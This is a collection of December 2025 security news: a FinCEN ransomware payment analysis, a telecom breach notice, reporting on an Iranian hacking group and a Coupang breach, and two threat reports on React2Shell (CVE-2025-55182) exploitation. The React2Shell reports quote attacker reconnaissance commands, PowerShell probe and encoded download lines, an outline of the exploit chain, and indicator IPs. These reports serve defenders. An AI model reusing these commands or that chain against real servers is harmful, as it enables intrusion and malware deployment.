| FinCEN.gov
December 04, 2025
WASHINGTON—Today, the U.S. Department of the Treasury’s Financial Crimes Enforcement Network (FinCEN) is issuing a Financial Trend Analysis on ransomware incidents in Bank Secrecy Act (BSA) data between 2022 and 2024, which totaled more than $2.1 billion in ransomware payments.
WASHINGTON—Today, the U.S. Department of the Treasury’s Financial Crimes Enforcement Network (FinCEN) is issuing a Financial Trend Analysis on ransomware incidents in Bank Secrecy Act (BSA) data between 2022 and 2024, which totaled more than $2.1 billion in ransomware payments.
“Banks and other financial institutions play a key role in protecting our economy from ransomware and other cyber threats,” said FinCEN Director Andrea Gacki. “By quickly reporting suspicious activity under the Bank Secrecy Act, they provide law enforcement with critical information to help detect cybersecurity trends that can damage our economy. This work is vital to safeguarding our nation’s financial sector and strengthening our national security.”
Previous FinCEN Financial Trend Analyses have focused on reported ransomware payments and incidents by the date the activity was filed with FinCEN. Today’s report shifts the focus to the incident date of each ransomware attack and offers greater visibility into the activities conducted by ransomware actors.
Reported Ransomware Incidents and Payments Reach All-Time High in 2023
Ransomware incidents and payments reported to FinCEN reached their highest level in 2023 with 1,512 incidents, totaling $1.1 billion in payment—an increase of 77 percent in total payments year-over-year from 2022 to 2023.
Following law enforcement’s disruption of two high-profile ransomware groups, ransomware incidents reported to FinCEN decreased in 2024, with 1,476 incidents, reflecting $734 million in the aggregate value of reported payments in BSA reports.
The median amount of a single ransomware transaction was $124,097 in 2022; $175,000 in 2023; and $155,257 in 2024. Between 2022 and 2024, the most common payment amount range was below $250,000.
FinCEN Data Shows Ransomware Payments Top $2.1B in Just Three Years
During the three-year review period (January 2022 – December 2024), FinCEN received 7,395 BSA reports related to 4,194 ransomware incidents totaling more than $2.1 billion in ransomware payments.
During the previous nine-year period (2013 through the end of 2021) FinCEN received 3,075 BSA reports totaling approximately $2.4 billion in ransomware payments.
Financial Services, Manufacturing, and Healthcare were the Most Impacted Industries
The manufacturing industry accounted for 456 incidents totaling approximately $284.6 million reported payments; the financial services industry accounted for 432 incidents totaling approximately $365.6 million reported payments; and the healthcare industry accounted for 389 incidents totaling approximately $305.4 million reported payments.
The Onion Router (TOR) was the Most Common Communication Method Reported
Threat actors most often communicated with their intended ransomware targets via messages sent over The Onion Router protocol, accounting for 67 percent of reports that provided the communication method.
Other ransomware threat actors communicated with their intended targets via email or through other private encrypted messaging systems.
ALPHV/BlackCat was the Most Prevalent Ransomware Variant Between 2022 and 2024
FinCEN identified more than 200 ransomware variants reported in BSA data.
The most reported variants were Akira, ALPHV/BlackCat, LockBit, Phobos, and Black Basta.
The 10 variants with the highest cumulative payment amounts identified in BSA reports accounted for approximately $1.5 billion in payments.
Ransomware is a complex cybersecurity problem requiring a variety of preventive, protective, and preparatory best practices. More information on FinCEN’s efforts to combat ransomware, including guidance and other resources for financial institutions, is available at www.fincen.gov/resources/fincen-combats-ransomware.
FinCEN’s FTA is available online at Ransomware Trends in Bank Secrecy Act Data
Questions or comments regarding the contents of this release should be addressed to the FinCEN Regulatory Support Section by submitting an inquiry at www.fincen.gov/contact.
FinCEN periodically publishes Financial Trend Analyses describing threat pattern and trend information derived from Bank Secrecy Act (BSA) filings to highlight priority illicit finance risks. These analyses provide information that is relevant to a wide range of consumers, businesses, and industries; communicate the value of BSA reporting; and enhance feedback loops between government users of BSA reports and their filers. Additionally, Financial Trend Analyses fulfill FinCEN’s obligations pursuant to section 6206 of the Anti-Money Laundering Act of 2020, which requires FinCEN to periodically publish threat pattern and trend information derived from BSA filings.
| Freedom Mobile
December 3, 2025
At Freedom Mobile, we take the protection of personal information very seriously. We want to inform you about a recent privacy incident that requires your attention.
On October 23, we detected unauthorized activity on our customer account management platform. Our investigation revealed that a third party used the account of a subcontractor to gain access to the personal information of a limited number of our customers. We quickly identified the incident and implemented corrective measures and security enhancements, including blocking the suspicious accounts and corresponding IP addresses.
While our teams continue to closely monitor the situation to prevent any further unauthorized access, we wanted to inform you of the incident so that you can take precautionary measures.
What personal information was accessed?
First and last name
Home address
Date of birth
Phone number (home and/or cell)
Freedom Mobile account number
Rest assured that this incident did not affect your payment information or passwords.
Although we have no reason to believe that this information was misused, we encourage you to follow best practices to protect your data:
Protect your personal information: Be cautious of any unexpected messages asking for personal information or directing you to a website to enter it. Freedom Mobile will never ask you for personal information such as credit card numbers, banking information, passwords, or PIN codes by email or SMS.
Stay alert with messages: Avoid clicking on links or downloading attachments from emails or texts that seem suspicious.
Monitor your accounts: Regularly check your accounts for unusual or suspicious activity.
To learn more about different types of fraud and how to protect yourself, visit the Canadian Anti-Fraud Centre website at https://antifraudcentre-centreantifraude.ca.
We’re sorry this happened and understand it may cause concern. If you have any questions, please contact us at privacyofficer@freedommobile.ca
Thank you for your attention.
The cyber group "Banished Kitten," operating under the alias "Handala" and affiliated with the Ministry of Intelligence and Security of Iran (MOIS), has once again exposed its own clumsy operations. This time, the group inadvertently revealed confidential access to Suvarnabhumi Airport (BKK) in Bangkok, Thailand, while attempting to claim they had compromised Israeli airport security. As previously reported, "Handala" operates under MOIS's Counter-Terrorism (CT) division, led by Seyed Yahya Hosseini Panjaki (alias "Seyed Yahya Hamidi"), Deputy of Internal Security at MOIS. Hosseini's reckless actions continue to endanger Iran's national interests, further exposing the group's incompetence.
The Blunder
On November 15, 2025, "Handala" published a propaganda piece titled "Smile for the Camera – Handala Is Watching," boasting about access to "Shabak's airport security systems" (Israel's domestic security agency). The post threatened: "Our presence defies your imagination. Handala is not just a name; it's a shadow, a watchful gaze in places you never expect, even at the exit cameras of your airport gates."
There's just one problem: the images aren't from Israel. A simple comparison of the published airport surveillance images with publicly available references clearly identifies the location as Suvarnabhumi Airport (BKK) in Bangkok, Thailand, not Ben Gurion Airport. The evidence is clear: the distinctive exposed steel beam ceiling structure, the immigration hall layout with its recognizable queue barriers, and the terminal's characteristic architecture all unmistakably match Bangkok's main international hub. The images show travelers in the passport control area with Suvarnabhumi's signature industrial ceiling design and escalators visible in the background. Once again, the CT Division's amateur operatives have failed basic operational security. This marks the first time the group has publicly disclosed accessing critical infrastructure outside Israel.
Suvarnabhumi Airport is no small target. According to official statistics, BKK handled 62,234,693 passengers in 2024, making it the busiest airport in Thailand, the 9th busiest airport in Asia, and ranking among the top 25 busiest airports worldwide. The airport serves as a major transit hub connecting Asia, Europe, and the Middle East, with traffic increasing 20% compared to the previous year. Since the airport's third runway opened in November 2024, capacity has expanded to 94 flights per hour, Suvarnabhumi is investing heavily in becoming a world-class hub.
What makes this breach particularly concerning is the sophistication of the systems potentially compromised. Suvarnabhumi Airport operates AI-powered facial recognition technology, license plate tracking, and integrated CCTV systems across the facility. The airport's Thailand Immigration System (TIS) maintains both "black lists" and "watch lists" with detection capabilities within 20 seconds of passport scanning. If MOIS has access to these systems, they could potentially monitor travelers, track movements, and identify targets passing through one of Asia's busiest transit points.
Warning to Iranians
Dear Iranians: even in Thailand, a popular destination and transit point for Iranian citizens traveling abroad, the oppressive regime is watching you. The Islamic Republic's intelligence apparatus has extended its surveillance to monitor Iranians traveling through Bangkok. Whether for business, tourism, or seeking freedom abroad, your movements may be tracked by Seyed Yahya's amateur operatives. With over 62 million passengers transiting through BKK annually, the potential for surveillance and targeting of Iranian dissidents, activists, and ordinary citizens is significant. It should be noted that Thailand is among the limited countries that Iranian citizens can travel to without needing a visa.
It's no surprise that "Handala" continues to make operational security mistakes. As recently exposed by Iran International, Ali Bermoudeh, a 27-year-old amateur hacker from Tabriz whose passwords for key accounts are simply his birthdate, works for this reckless group. His handler at MOIS is Morteza Aftabifar. When your cyber operators can't distinguish between Tel Aviv and Bangkok, and secure their accounts with passwords like "1377629" perhaps it's time for Seyed Yahya to reconsider his recruitment standards.
Thai authorities should be aware: the Islamic Republic's Ministry of Intelligence has compromised security systems at Suvarnabhumi Airport. This is not speculation. MOIS's own cyber group published the evidence themselves. A breach of this magnitude by a state-sponsored threat actor, one designated as a terrorist organization by the European Union, demands immediate investigation and response. But hey, at least they got the continent right this time. The real question is: what will Thailand do about it?
chosun.com
Coupang Executives Sell Shares After Data Breach Coupang executives sold shares post-breach; President Lee Jae-myung seeks responsibility Amid growing
Amid growing calls for accountability against Kim Bom-suk, 47, chairman of Coupang Inc., over the data breach affecting 33.7 million individuals, it has been confirmed that key Coupang executives sold billions of won worth of company stock. The timing of these sales—immediately after the incident—is expected to spark significant controversy.
According to a U.S. Securities and Exchange Commission (SEC) filing on the 2nd (local time), Gaurav Anand, Coupang’s chief financial officer (CFO), reported selling 75,350 Coupang Inc. shares at approximately $29 per share on the 10th of last month. The sale amounted to around $2.186 million (approximately 3.2 billion Korean won). Additionally, former Vice President Pranam Kolari sold 27,388 Coupang shares on the 17th of last month, with the transaction valued at $772,000 (approximately 1.13 billion Korean won). Kolari, who oversaw search and recommendation technologies, resigned on the 14th of last month. However, the SEC confirmed he had notified the company of his resignation on October 15th, prior to the incident.
According to a breach incident report submitted to the Korea Internet & Security Agency (KISA) and obtained by the office of Science, ICT, Broadcasting, and Communications Committee Chairman Representative Choi Min-hee, Coupang reported unauthorized access to its account information at 6:38 p.m. on the 6th of last month. This predates the executives’ stock sales. However, the company recorded the time of awareness as 10:52 p.m. on the 18th of last month. While the sales occurred before the company publicly acknowledged the breach, the transactions took place after the incident itself, making controversy inevitable.
Domestically, criticism has emerged holding Chairman Kim ultimately responsible for the incident. President Lee Jae-myung also stated during a Cabinet meeting on the 2nd, “Coupang has caused significant public concern. The cause of the accident must be identified swiftly, and responsibility must be held strictly,” while instructing measures such as strengthening penalties and implementing a punitive damages system.
cyble.com
December 8, 2025
China-nexus groups rapidly exploited React2Shell (CVE-2025-55182). Learn how the React Server Components flaw was weaponized within minutes of disclosure.
React2Shell (CVE-2025-55182) was exploited within minutes by China-nexus groups, exposing critical weaknesses in React Server Components.
The vulnerability disclosure cycle has entered a new era, one where the gap between publication and weaponization is measured in minutes, not days. It has been confirmed that China-nexus threat actors began actively exploiting a critical React Server Components flaw, React2Shell, only hours after its public release.
The vulnerability, tracked as CVE-2025-55182, impacts React Server Components across React 19.x and Next.js 15.x/16.x deployments using the App Router and carries a CVSS 10.0 severity rating, enabling unauthenticated remote code execution (RCE).
CISA immediately added the flaw to its Known Exploited Vulnerabilities catalog, stating:
“CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.”
The Researcher’s PoCs and the Mechanism of Exploitation
Lachlan Davidson, who has been attributed with finding this flaw, published the original PoCs on GitHub, explaining:
“As public PoCs are circulating and Google’s Scanner uses a variation of my original submitted PoC, it’s finally a responsible time to share my original PoCs for React2Shell.”
Davidson released three PoCs, 00-very-first-rce-poc, 01-submitted-poc.js, and 02-meow-rce-poc, and summarized the attack chain:
“$@x gives you access to a Chunk”
“We plant its then on our own object”
“The JS runtime automatically unravels nested promises”
“We now re-enter the parser, but with control of a malicious fake Chunk object”
“Planting things on _response lets us access a lot of gadgets”
“RCE”
He also noted that “the publicly recreated PoC… did otherwise use the same _formData gadget that mine did”, though the chaining primitive in his then implementation was not universally adopted.
Rapid Weaponization by China-Nexus Groups
AWS detected exploitation beginning within hours of public disclosure on December 3, based on telemetry from its MadPot honeypot infrastructure. The actors included:
Earth Lamia, known for targeting financial, logistics, and government sectors across Latin America, MENA, and Southeast Asia.
Jackpot Panda, primarily focused on East and Southeast Asian organizations aligned with domestic security interests.
AWS stated, “China continues to be the most prolific source of state-sponsored cyber threat activity, with threat actors routinely operationalizing public exploits within hours or days of disclosure.”
Attackers overwhelmingly prioritized speed over precision, firing flawed and incomplete public PoCs at large swaths of the internet in a high-volume scanning wave. Many PoCs made unrealistic assumptions, such as assuming exposed fs, vm, or child_process modules that never appear in real deployments.
Yet this volume-based strategy still identifies edge-case vulnerable configurations.
Technical Analysis: React2Shell in the RSC Flight Protocol
CRIL (Cyble Research and Intelligence Labs) found that at its core, CVE-2025-55182 (React2Shell) is an unsafe deserialization flaw in the React Server Components Flight protocol. It affects:
react-server-dom-webpack
react-server-dom-parcel
react-server-dom-turbopack
Across React versions 19.0.0–19.2.0, patched in 19.0.1, 19.1.2, and 19.2.1.
Next.js is additionally vulnerable under CVE-2025-66478, impacting all versions from 14.3.0-canary.77, all unpatched 15.x builds, and all 16.x releases before 16.0.7.
Attack telemetry showed:
Automated scanners with user-agent randomization
Parallel exploitation of CVE-2025-1338
Immediate PoC adoption regardless of accuracy
Manual exploitation attempts, including whoami, id, and /etc/passwd reads
File write attempts such as /tmp/pwned.txt
A concentrated cluster originating from 183[.]6.80.214 executed 116 requests over 52 minutes, demonstrating active operator involvement.
Cloudflare’s Emergency Downtime While Mitigating React2Shell
The severity of React2Shell (CVE-2025-55182) was spotlighted when Cloudflare intentionally took down part of its own network to apply emergency defenses. The outage affected 28% of Cloudflare-served HTTP traffic early Friday.
Cloudflare CTO Dane Knecht clarified that the disruption “was not caused, directly or indirectly, by a cyberattack… Instead, it was triggered by changes being made to our body parsing logic while attempting to detect and mitigate an industry-wide vulnerability disclosed this week in React Server Components.”
This incident unfolded as researchers observed attackers hammering the vulnerability, alongside waves of legitimate and fraudulent proofs of concept circulating online.
Global Warnings Ring-In
The Australian Cyber Security Centre (ACSC) issued a public notice, stating, “This alert is relevant to all Australian businesses and organizations… ASD’s ACSC is aware of a critical vulnerability in React Server Components… Organizations should review their networks for vulnerable instances of these packages and upgrade to fixed versions.”
Organizations must assume that scanning React2Shell is continuous and widespread. ACSC outlined some Immediate steps for mitigation.
Update all React/Next.js deployments: Verify versions against vulnerable ranges and upgrade to patched releases.
Enable AWS WAF interim protection rules: These block known exploit sequences during patching windows.
Review logs for exploitation indicators: Look for malformed RSC payloads, next-action or rsc-actionid headers, and repeated sequential failures.
Inspect backend systems for post-exploitation behavior: Unexpected execution, unauthorized file writes, or suspicious commands.
Conclusion
The exploitation of React2Shell (CVE-2025-55182) shows how quickly high-severity vulnerabilities in critical and widely adopted components can be weaponized. China-nexus groups and opportunistic actors began targeting the flaw within minutes of disclosure, using shared infrastructure and public PoCs, accurate or not, to launch high-volume attacks. Organizations using React or Next.js App Router must patch immediately and monitor for iterative, operator-driven activity.
Given this tempo, organizations need intelligence and automation that operate in real time. Cyble, ranked #1 globally in Cyber Threat Intelligence Technologies by Gartner Peer Insights, provides AI-native security capabilities through platforms such as Cyble Vision and Blaze AI. These systems identify threats early, correlate IOCs across environments, and automate response actions.
Schedule a personalized demo to evaluate how AI-native threat intelligence can strengthen your security posture against vulnerabilities like React2Shell.
Indicators of Compromise
206[.]237.3.150
45[.]77.33.136
143[.]198.92.82
183[.]6.80.214
MITRE ATT&CK Techniques
Tactic Technique ID Technique Name
Initial Access T1190 Exploit Public-Facing Application
Privilege Escalation T1068 Exploitation for Privilege Escalation
bleepingcomputer.com
By Lawrence Abrams
December 6, 2025
Over 77,000 Internet-exposed IP addresses are vulnerable to the critical React2Shell remote code execution flaw (CVE-2025-55182), with researchers now confirming that attackers have already compromised over 30 organizations across multiple sectors.
React2Shell is an unauthenticated remote code execution vulnerability that can be exploited via a single HTTP request and affects all frameworks that implement React Server Components, including Next.js, which uses the same deserialization logic.
React disclosed the vulnerability on December 3, explaining that unsafe deserialization of client-controlled data inside React Server Components enables attackers to trigger remote, unauthenticated execution of arbitrary commands.
Developers are required to update React to the latest version, rebuild their applications, and then redeploy to fix the vulnerability.
On December 4, security researcher Maple3142 published a working proof-of-concept demonstrating remote command execution against unpatched servers. Soon after, scanning for the flaw accelerated as attackers and researchers began using the public exploit with automated tools.
Over 77,000 vulnerable IP addresses
Shadowserver Internet watchdog group now reports that it has detected 77,664 IP addresses vulnerable to the React2Shell flaw, with approximately 23,700 in the United States.
The researchers determined that IP addresses were vulnerable using a detection technique developed by Searchlight Cyber/Assetnote, where an HTTP request was sent to servers to exploit the flaw, and a specific response was checked to confirm whether a device was vulnerable.
GreyNoise also recorded 181 distinct IP addresses attempting to exploit the flaw over the past 24 hours, with most of the traffic appearing automated. The researchers say the scans are primarily originating from the Netherlands, China, the United States, Hong Kong, and a small number of other countries.
Palo Alto Networks reports that more than 30 organizations have already been compromised through the React2Shell flaw, with attackers exploiting the vulnerability to run commands, conduct reconnaissance, and attempt to steal AWS configuration and credential files.
These compromises include intrusions linked to known state-associated Chinese threat actors.
Widespread exploitation of React2Shell
Since its disclosure, researchers and threat intelligence companies have observed widespread exploitation of the CVE-2025-55182 flaw.
GreyNoise reports that attackers frequently begin with PowerShell commands that perform a basic math function to confirm the device is vulnerable to the remote code execution flaw.
These tests return predictable results while leaving minimal signs of exploitation:
powershell -c "4013841979"
powershell -c "4032043488"
Once remote code execution was confirmed, attackers were seen executing base64-encoded PowerShell commands that download additional scripts directly into memory.
powershell -enc <base64>
One observed command executes a second-stage PowerShell script from the external site (23[.]235[.]188[.]3), which is used to disable AMSI to bypass endpoint security and deploy additional payloads.
According to VirusTotal, the PowerShell script observed by GreyNoise installs a Cobalt Strike beacon on the targeted device, giving threat actors a foothold on the network.
Amazon AWS threat intelligence teams also saw rapid exploitation hours after the disclosure of the React CVE-2025-55182 flaw, with infrastructure associated with China-linked APT hacking groups known as Earth Lamia and Jackpot Panda.
In this exploitation, the threat actors perform reconnaissance on vulnerable servers by using commands such as whoami and id, attempting to write files, and reading /etc/passwd.
Palo Alto Networks also observed similar exploitation, attributing some of it to UNC5174, a Chinese state-sponsored threat actor believed to be tied to the Chinese Ministry of State Security.
"Unit 42 observed threat activity we assess with high confidence is consistent with CL-STA-1015 (aka UNC5174), a group suspected to be an initial access broker with ties to the Chinese Ministry of State Security," Justin Moore, Senior Manager at Palo Alto Networks Unit 42, told BleepingComputer via email.
"In this activity, we observed the deployment of Snowlight and Vshell malware, both highly consistent with Unit 42 knowledge of CL-STA-1015 (also known as UNC5174)."
The deployed malware in these attacks is:
Snowlight: A malware dropper that allows remote attackers to drop additional payloads on breached devices.
Vshell: A backdoor commonly used by Chinese hacking groups for remote access, post-exploitation activity, and to move laterally through a compromised network.
The rush to patch
Due to the severity of the React flaw, companies worldwide have rushed to install the patch and apply mitigations.
Yesterday, Cloudflare rolled out emergency detections and mitigations for the React flaw in its Web Application Firewall (WAF) due to its widespread exploitation and severity.
However, the update inadvertently caused an outage affecting numerous websites before the rules were corrected.
CISA has also added CVE-2025-55182 to the Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to apply patches by December 26, 2025, under Binding Operational Directive 22-01.
Organizations using React Server Components or frameworks built on top of them are advised to apply updates immediately, rebuild and redeploy their applications, and review logs for signs of PowerShell or shell command execution.
